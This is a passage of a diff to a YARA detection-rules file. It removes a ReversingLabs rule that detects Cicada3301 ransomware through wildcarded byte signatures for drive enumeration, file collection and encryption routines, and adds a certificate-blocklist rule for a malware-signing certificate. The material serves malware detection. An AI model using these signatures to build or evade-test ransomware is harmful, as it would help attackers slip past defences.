+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMO-K Limited Liability Company" and ( pe.signatures [ i ] . serial == "00:d0:8d:83:ff:11:8d:f3:77:7e:37:1c:5c:48:2c:ce:7b" or pe.signatures [ i ] . serial == "d0:8d:83:ff:11:8d:f3:77:7e:37:1c:5c:48:2c:ce:7b" ) and 1444780800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Cicada3301 : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_06Ce209477F1Ac19A2049Bdc5846A831 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Cicada3301 ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c1a60870-0b68-5f2f-a74f-34e493a5e251"
-		date = "2024-10-09"
-		modified = "2024-10-09"
+		id = "21c16e2c-bc0c-5e1d-bc44-6d7c4afc34cb"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Cicada3301.yara#L1-L309"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9479667fd4c7f865607ece6af985ab6fa7b62f98738c338e4155059551db8a21"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16176-L16192"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "24474c4033a8cad1690160da64b75a1eec570f56e830967256c19574bde59384"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Cicada3301"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$get_valid_drives = {
-            55 89 E5 53 57 56 83 EC ?? A1 ?? ?? ?? ?? 0F B6 00 6A ?? 6A ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 28 0D ?? ?? ?? ?? 0F 28 15 ?? ??
-            ?? ?? 89 C6 0F 11 00 0F 11 48 ?? 0F 28 0D ?? ?? ?? ?? 0F 11 50 ?? 0F 28 15 ?? ?? ??
-            ?? 0F 11 48 ?? 0F 28 0D ?? ?? ?? ?? 0F 11 50 ?? 0F 11 48 ?? C7 40 ?? ?? ?? ?? ?? C7
-            40 ?? ?? ?? ?? ?? 83 C0 ?? 8D 4D ?? 50 56 51 E8 ?? ?? ?? ?? 83 C4 ?? 80 7D ?? ?? 0F
-            84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 89 45 ?? 83 FF ?? 0F 82 ?? ?? ?? ?? 8B 5D ??
-            8D 04 7F 89 75 ?? 89 7D ?? 8D 74 83 ?? 66 2E 0F 1F 84 00 ?? ?? ?? ?? 90 57 6A ?? 8D
-            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 8D 4F ?? 39 D1 0F 83 ?? ?? ?? ?? 39 D0 0F
-            83 ?? ?? ?? ?? 8B 56 ?? 8D 04 40 89 CF 89 55 ?? F2 0F 10 06 F2 0F 11 45 ?? 8B 54 83
-            ?? F2 0F 10 04 83 F2 0F 11 06 89 56 ?? 83 C6 ?? 83 F9 ?? 8B 55 ?? 89 54 83 ?? F2 0F
-            10 45 ?? F2 0F 11 04 83 77 ?? 8B 45 ?? 8B 75 ?? FF 08 75 ?? FF 48 ?? 75 ?? 6A ?? 68
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? 8B 45 ?? F2 0F 10 45 ?? 89 47 ?? F2
-            0F 11 07 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 F8 83 C4 ?? 5E 5F 5B 5D C3
-        }
-		$collect_files_recursively_p1 = {
-            55 89 E5 53 57 56 83 E4 ?? 81 EC ?? ?? ?? ?? 8B 4D ?? 8B 7D ?? 8B 75 ?? 8B 45 ?? 89
-            4C 24 ?? 89 44 24 ?? 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 84 C0 0F 84 ?? ?? ?? ??
-            8D 9C 24 ?? ?? ?? ?? 57 56 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 BC 24 ?? ?? ?? ?? ?? 75 ??
-            8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ??
-            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            53 56 E8 ?? ?? ?? ?? 83 C4 ?? 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 7D ?? 8B
-            5D ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 04 FB C7
-            84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 84 24 ?? ?? ?? ??
-            8D 8C 24 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 0F
-            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D B4 24 ?? ?? ?? ?? 56 E8 ??
-            ?? ?? ?? 83 C4 ?? 56 8D 74 24 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 52 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B BC 24 ?? ?? ?? ?? 8B 9C
-            24 ?? ?? ?? ?? 85 FF 89 FA 0F 44 D3 8D 8C 24 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            68 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 ?? 85 DB 74 ??
-            6A ?? 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 84 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 7D
-            ?? 89 44 24 ?? 89 0C 24 EB ?? 66 90 83 C7 ?? 80 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 3B BC
-        }
-		$collect_files_recursively_p2 = {
-            24 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 77 ?? FF 37 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? FF 34 24 FF 74 24 ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 74 24 ?? FF 74 24
-            ?? 56 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 80 BC 24 ?? ?? ?? ?? ?? 0F 84
-            ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? F2 0F 10 84 24 ?? ?? ?? ?? F2 0F 10 94 24 ?? ?? ??
-            ?? F2 0F 10 8C 24 ?? ?? ?? ?? 8B 5C 24 ?? 89 84 24 ?? ?? ?? ?? F2 0F 11 84 24 ?? ??
-            ?? ?? F2 0F 11 8C 24 ?? ?? ?? ?? F2 0F 11 94 24 ?? ?? ?? ?? FF 74 24 ?? 53 8D 84 24
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 88 44 24 ?? 8B 44 24 ?? 85 C0 74 ?? 6A ?? 50
-            53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 85 C0 74 ?? 6A ?? 50 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 84 24 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 50 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 8B B4 24 ?? ?? ?? ?? 85 F6 74 ?? 8B 9C 24 ?? ?? ?? ?? 83 C3 ?? EB ?? 66 2E 0F
-            1F 84 00 ?? ?? ?? ?? 90 83 C3 ?? 4E 74 ?? 83 7B ?? ?? 72 ?? 8B 03 85 C0 74 ?? C1 E0
-            ?? 6A ?? 50 FF 73 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 66 2E 0F 1F 84 00 ?? ?? ?? ?? 90
-            8B 84 24 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C1 E0 ?? 6A ?? 50 FF B4 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? 8D 44 24 ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B 5C 24 ?? 89 44 24 ?? 89 54 24 ?? 85 DB 0F 84 ?? ?? ?? ?? 83 FB ?? 0F
-            85 ?? ?? ?? ?? 8B 74 24 ?? F0 FF 86 ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F
-            1F 44 00 ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 52 50 8D 84 24 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8B 84 24 ?? ?? ?? ?? 83 F0 ?? 0B 84 24 ?? ?? ?? ?? 75 ?? 8B 84
-            24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? EB
-        }
-		$collect_files_recursively_p3 = {
-            8D 94 24 ?? ?? ?? ?? 8D 9C 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 D7 89 DE F3 A5 8B 84 24
-            ?? ?? ?? ?? 83 F0 ?? 0B 84 24 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? ??
-            0F 85 ?? ?? ?? ?? 8B BC 24 ?? ?? ?? ?? 8B 77 ?? 8B 1F 8B 06 53 FF D0 83 C4 ?? 8B 46
-            ?? 85 C0 74 ?? FF 76 ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 57 E8 ?? ?? ?? ??
-            83 C4 ?? EB ?? 8B 74 24 ?? F0 FF 86 ?? ?? ?? ?? 7F ?? E9 ?? ?? ?? ?? 8B 74 24 ?? F0
-            FF 06 0F 8E ?? ?? ?? ?? 89 5C 24 ?? 89 74 24 ?? FF 75 ?? 8D BC 24 ?? ?? ?? ?? 57 E8
-            ?? ?? ?? ?? 83 C4 ?? 57 56 53 FF 75 ?? FF 75 ?? FF 74 24 ?? FF 74 24 ?? 8D 84 24 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 84 24 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B
-            84 24 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 50 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            8B 44 24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 84 24 ?? ??
-            ?? ?? F0 FF 08 0F 85 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 DF 89 D6 F3 A5 53 E8 ?? ?? ?? ?? 83 C4 ?? 09 D0 0F 84
-            ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 74 ?? 52 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 31 DB 83 7C 24 ?? ?? 75 ?? 8B
-            5C 24 ?? 8B 7C 24 ?? EB ?? 8B BC 24 ?? ?? ?? ?? 31 DB 85 DB B8 ?? ?? ?? ?? 89 BC 24
-            ?? ?? ?? ?? 0F 44 FB 0F 44 D8 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 52 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 52 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            83 7C 24 ?? ?? 8B 4C 24 ?? 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 89 C8 83 F8 ?? 0F 82 ?? ??
-            ?? ?? 89 4C 24 ?? 8B 0E BA ?? ?? ?? ?? 31 D1 0F B6 56 ?? 83 F2 ?? 09 CA 0F 85 ?? ??
-            ?? ?? 83 C0 ?? 8D 4E ?? 50 51 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 80 7C 24
-        }
-		$collect_files_recursively_p4 = {
-            0F 85 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 89 C1 85 C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 50 51 89 4C 24 ?? E8 ??
-            ?? ?? ?? 8B 0C 24 89 44 24 ?? 51 E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 74 ?? 81 7C 24 ?? ??
-            ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 52 50 8D 44 24 ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7C 24 ?? ?? 8B 4C 24 ?? 8B 54 24 ?? B8 ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F 45 C8 B8 ??
-            ?? ?? ?? 0F 45 D0 8D 84 24 ?? ?? ?? ?? 89 0C 24 89 44 24 ?? 8D 44 24 ?? 89 54 24 ??
-            C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 8B 0C 24 8B 54 24 ?? 89 44 24 ?? 8B 44 24
-            ?? 89 54 24 ?? 89 84 24 ?? ?? ?? ?? 89 C8 29 D0 BA ?? ?? ?? ?? 72 ?? 03 44 24 ?? FF
-            74 24 ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 8B 54 24 ?? 85 C0 B8 ??
-            ?? ?? ?? 0F 45 D0 8B 84 24 ?? ?? ?? ?? 89 54 24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ??
-            E8 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 83 C4 ?? 89 C8 29 D0 89 44 24 ?? 50 8B 44 24
-            ?? 50 51 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 84 24 ?? ?? ?? ??
-            3C ?? 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 8B 7C 24 ?? BE ?? ?? ?? ?? 39 04 24 74 ?? 85 FF
-            0F 88 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F B6 00 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 89 C6 85
-            C0 0F 84 ?? ?? ?? ?? 57 FF 74 24 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 74 24 ?? 89 7C 24
-            ?? 89 7C 24 ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4
-        }
-		$collect_files_recursively_p5 = {
-            8B 7C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 74 24 ?? 56 E8
-            ?? ?? ?? ?? 83 C4 ?? 56 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ??
-            ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 74 24 ?? 85 DB 89 44 24 ?? 89 0C 24 74 ?? 6A ??
-            53 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? EB ?? 31 C0 BE ?? ?? ?? ?? 83 F8 ?? 0F 83 ?? ?? ?? ?? 89 44
-            24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ??
-            ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F2 0F 10 44 24 ?? 8B 44
-            24 ?? F2 0F 11 44 24 ?? 39 C7 89 44 24 ?? 8B 4C 24 ?? 89 0C 24 75 ?? 57 FF 74 24 ??
-            53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 7C 24 ?? ?? 75 ?? 8B 06 8B 76 ?? B9 ?? ??
-            ?? ?? BA ?? ?? ?? ?? 31 C8 31 D6 09 C6 74 ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            52 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B 5C
-            24 ?? 8B 7C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 0F 88 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F B6 00
-            6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 89 C6 85 C0 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 44
-        }
-		$collect_files_recursively_p6 = {
-            24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 66 2E 0F 1F 84 00 ??
-            ?? ?? ?? 0F 1F 44 00 ?? 8B 84 24 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 84 24 ?? ?? ?? ?? F0 FF 08 0F 85 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 31 FF BB ?? ?? ?? ?? 85 FF 0F 85 ?? ?? ?? ?? BE ?? ??
-            ?? ?? 57 89 5C 24 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 74 24 ?? 89 7C 24 ?? 89 7C 24
-            ?? 6A ?? 57 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 8B 74 24 ?? 66 C7 44
-            30 ?? ?? ?? C7 04 30 ?? ?? ?? ?? 8B 45 ?? 83 C6 ?? F2 0F 10 44 24 ?? 89 74 24 ?? 8B
-            08 8B 58 ?? F2 0F 11 44 24 ?? 8B 44 24 ?? 89 4C 24 ?? 29 F0 39 D8 73 ?? 53 56 8D 44
-            24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 74 24 ?? 8B 44 24 ?? 01 F0 53 FF 74 24 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? F2 0F 10 44 24 ?? 01 DE 89 B4 24 ?? ?? ?? ?? F2 0F 11 84 24 ??
-            ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 56 53 57 FF 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 0F B6 84 24 ?? ?? ?? ?? 3C ?? 88 44 24 ?? 0F 85 ?? ?? ?? ?? 8D 84 24
-            ?? ?? ?? ?? 50 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 7C 24 ?? 85
-            FF 0F 84 ?? ?? ?? ?? 8B 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 5C 24 ?? 53 E8 ?? ?? ?? ?? 83
-            C4 ?? 53 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 44
-            24 ?? 8B 4C 24 ?? 8B 5C 24 ?? 85 F6 89 44 24 ?? 89 4C 24 ?? 74 ?? 6A ?? 56 57 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 DB 74 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 85 C0 74 ?? 6A ??
-            50 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 85 C0 74 ?? 6A ?? 50 FF 74 24
-        }
-		$encrypt_files_full_v1_p1 = {
-            55 89 E5 53 57 56 83 E4 ?? 81 EC ?? ?? ?? ?? 89 54 24 ?? 89 4C 24 ?? 6A ?? 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 89 C7 89 44 24 ??
-            0F 85 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 47 ?? 89 44 24 ?? EB ?? 66 2E 0F
-            1F 84 00 ?? ?? ?? ?? 0F 1F 44 00 ?? 8B 06 01 F8 53 FF 74 24 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 01 DF 89 7E ?? 8B 7C 24 ?? 68 ?? ?? ?? ?? 57 FF 74 24 ?? 8D 44 24 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 0F B6 44 24 ?? 3C ?? 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 85 F6 0F 84 ??
-            ?? ?? ?? 8B 45 ?? 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ?? F2 0F 10 40 ?? F3 0F 7E 48 ?? F2
-            0F 11 41 ?? F2 0F 10 40 ?? 66 0F D6 49 ?? F2 0F 11 41 ?? F2 0F 10 00 8B 42 ?? F2 0F
-            11 01 F3 0F 7E 02 89 44 24 ?? A1 ?? ?? ?? ?? 66 0F D6 44 24 ?? 0F B6 00 3C ?? 75 ??
-            E8 ?? ?? ?? ?? F2 0F 10 44 24 ?? F3 0F 7E 4C 24 ?? 8B 44 24 ?? 0F B6 5C 24 ?? 0F B7
-            54 24 ?? 81 FE ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10
-            44 24 ?? 66 0F D6 8C 24 ?? ?? ?? ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2
-            0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24 ?? F2 0F 11 84 24 ?? ?? ?? ?? F2 0F 10 44 24
-            ?? F2 0F 11 44 24 ?? F3 0F 7E 44 24 ?? 89 41 ?? 66 0F D6 41 ?? C7 41 ?? ?? ?? ?? ??
-            C7 01 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7
-            41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7
-            41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7
-            41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 88 59 ?? 66 89 51 ?? C7
-            84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 89 F0 89 7C
-        }
-		$encrypt_files_full_v1_p2 = {
-            24 ?? 89 7C 24 ?? C1 E8 ?? 89 44 24 ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? 89 F3 83 E3 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 0F B6 00 3C ?? 75 ?? 8D 4C
-            24 ?? 8D 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 44 00 ?? F3 0F 6F 64
-            24 ?? F3 0F 6F 94 24 ?? ?? ?? ?? F3 0F 6F 84 24 ?? ?? ?? ?? F3 0F 6F BC 24 ?? ?? ??
-            ?? B8 ?? ?? ?? ?? 66 0F 6F F4 66 0F 6F DA 66 0F 6F E8 66 0F 7F 7C 24 ?? 0F 1F 84 00
-            ?? ?? ?? ?? 66 0F FE F3 48 66 0F EF EE 66 0F 6F CD 66 0F 72 F5 ?? 66 0F 72 D1 ?? 66
-            0F EB E9 66 0F FE FD 66 0F EF DF 66 0F 6F CB 66 0F 72 F3 ?? 66 0F 72 D1 ?? 66 0F EB
-            D9 66 0F FE F3 66 0F EF EE 66 0F 70 F6 ?? 66 0F 6F CD 66 0F 72 F5 ?? 66 0F 72 D1 ??
-            66 0F EB E9 66 0F FE FD 66 0F 70 ED ?? 66 0F EF DF 66 0F 70 FF ?? 66 0F 6F CB 66 0F
-            72 F3 ?? 66 0F 72 D1 ?? 66 0F EB D9 66 0F FE F3 66 0F EF EE 66 0F 6F CD 66 0F 72 F5
-            ?? 66 0F 72 D1 ?? 66 0F EB E9 66 0F FE FD 66 0F EF DF 66 0F 6F CB 66 0F 72 F3 ?? 66
-            0F 72 D1 ?? 66 0F EB D9 66 0F FE F3 66 0F EF EE 66 0F 70 F6 ?? 66 0F 6F CD 66 0F 72
-            F5 ?? 66 0F 72 D1 ?? 66 0F EB E9 66 0F FE FD 66 0F 70 ED ?? 66 0F EF DF 66 0F 70 FF
-            ?? 66 0F 6F CB 66 0F 72 F3 ?? 66 0F 72 D1 ?? 66 0F EB D9 0F 85 ?? ?? ?? ?? 66 0F FE
-            7C 24 ?? 66 0F 7E C0 66 0F FE F4 66 0F FE DA 66 0F FE E8 40 F3 0F 7F B4 24 ?? ?? ??
-            ?? F3 0F 7F 9C 24 ?? ?? ?? ?? F3 0F 7F BC 24 ?? ?? ?? ?? F3 0F 7F AC 24 ?? ?? ?? ??
-            89 84 24 ?? ?? ?? ?? 89 F2 31 C9 83 E2 ?? 83 FB ?? 8D 04 17 0F 82 ?? ?? ?? ?? 31 C9
-        }
-		$encrypt_files_full_v1_p3 = {
-            83 FB ?? 72 ?? 03 54 24 ?? 89 F7 89 D9 83 E7 ?? 89 7C 24 ?? 29 F9 31 FF 66 2E 0F 1F
-            84 00 ?? ?? ?? ?? 66 90 F3 0F 6F 44 3A ?? F3 0F 6F 94 3C ?? ?? ?? ?? F3 0F 6F 0C 3A
-            F3 0F 6F 9C 3C ?? ?? ?? ?? 66 0F EF D0 66 0F EF D9 F3 0F 7F 54 3A ?? F3 0F 7F 1C 3A
-            83 C7 ?? 39 F9 75 ?? 8B 54 24 ?? 85 D2 74 ?? 83 FA ?? 72 ?? 89 F2 89 CF 89 D9 83 E2
-            ?? 29 D1 90 F3 0F 7E 04 38 F3 0F 7E 8C 3C ?? ?? ?? ?? 66 0F EF C8 66 0F D6 0C 38 83
-            C7 ?? 39 F9 75 ?? 85 D2 74 ?? 66 2E 0F 1F 84 00 ?? ?? ?? ?? 0F 1F 40 ?? 0F B6 94 0C
-            ?? ?? ?? ?? 30 14 08 41 39 CB 75 ?? 88 9C 24 ?? ?? ?? ?? 89 F3 8B 74 24 ?? 8B 46 ??
-            8B 7E ?? 29 F8 39 D8 0F 87 ?? ?? ?? ?? 53 8B 7C 24 ?? 57 56 8D 44 24 ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 0F B6 44 24 ?? 3C ?? 0F 84 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 89 54
-            24 ?? 89 4C 24 ?? 88 44 24 ?? A1 ?? ?? ?? ?? 0F B6 00 6A ?? 6A ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 0F 84 ?? ?? ?? ?? F2 0F 10 44 24 ?? 89 C7 BB ?? ?? ?? ?? F2 0F 11 00 EB
